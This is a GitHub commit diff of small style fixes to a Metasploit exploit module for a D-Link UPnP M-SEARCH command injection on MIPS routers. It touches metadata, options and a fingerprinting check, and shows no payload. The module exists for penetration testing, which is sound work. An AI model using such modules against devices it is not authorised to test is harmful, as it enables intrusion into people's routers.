Skip to content

Commit 36c6e74

Browse files
committed
Do minor fixes
1 parent 579ce0a commit 36c6e74

File tree

1 file changed

+10
-8
lines changed

1 file changed

+10
-8
lines changed

modules/exploits/linux/upnp/dlink_upnp_msearch_exec_echo.rb

Lines changed: 10 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -22,13 +22,13 @@ def initialize(info = {})
2222
'Author' =>
2323
[
2424
'Zachary Cutlip', # Vulnerability discovery and initial exploit
25-
'Michael Messner <devnull@s3cur1ty.de>' # Metasploit module and verification on other routers
25+
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
2626
],
2727
'License' => MSF_LICENSE,
2828
'References' =>
2929
[
30-
[ 'URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection' ], # original exploit
31-
[ 'URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html' ] # original exploit
30+
['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
31+
['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
3232
],
3333
'DisclosureDate' => 'Feb 01 2013',
3434
'Privileged' => true,
@@ -40,21 +40,23 @@ def initialize(info = {})
4040
'Arch' => ARCH_MIPSLE
4141
}
4242
],
43-
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
43+
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
4444
{
4545
'Platform' => 'linux',
4646
'Arch' => ARCH_MIPS
4747
}
48-
],
48+
]
4949
],
5050
'DefaultTarget' => 0
5151
))
52+
5253
register_options(
5354
[
5455
Opt::RHOST(),
55-
Opt::RPORT(1900),
56+
Opt::RPORT(1900)
5657
], self.class)
5758

59+
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
5860
end
5961

6062
def check
@@ -72,8 +74,8 @@ def check
7274
res = nil
7375
1.upto(5) do
7476
res,_,_ = udp_sock.recvfrom(65535, 1.0)
75-
break if res and res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
76-
udp_sock.sendto(msearch, rhost, rport, 0)
77+
break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
78+
udp_sock.sendto(pkt, rhost, rport, 0)
7779
end
7880

7981
# UPnP response:

0 commit comments

Comments
 (0)